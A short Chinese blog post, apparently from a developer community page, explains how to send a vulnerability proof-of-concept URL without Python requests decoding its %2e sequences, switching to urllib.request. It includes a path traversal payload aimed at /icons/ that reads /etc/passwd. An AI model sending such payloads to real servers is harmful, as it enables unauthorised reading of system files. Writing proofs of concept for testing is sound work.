python requests请求url中存在url编码字符时发送请求如何不进行自动解码
今天在写漏洞POC的时候,poc是如下这样的,其中%2e是 . 的url编码形式,我用requests发送请求时会自动将%2e url解码为 . 。这样是不行的,必须要使用原始字符串方式进行发送http://172.16.10.102:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd如下我用requests发送请求,我将脚本的流量截取,发现自动将%2e
·
今天在写漏洞POC的时候,poc是如下这样的,其中%2e是 . 的url编码形式,我用requests发送请求时会自动将%2e url解码为 . 。这样是不行的,必须要使用原始字符串方式进行发送
http://172.16.10.102:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd如下我用requests发送请求,我将脚本的流量截取,发现自动将%2e转换成了 .
所以,现在需要解决这个问题,如何不让其自动转换。我发现使用urllib.request可以让其不自动解码。如下成功解决
关于 ——> python中urllib.request使用
腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。
更多推荐
0
0- 0
已为社区贡献10条内容
所有评论(0)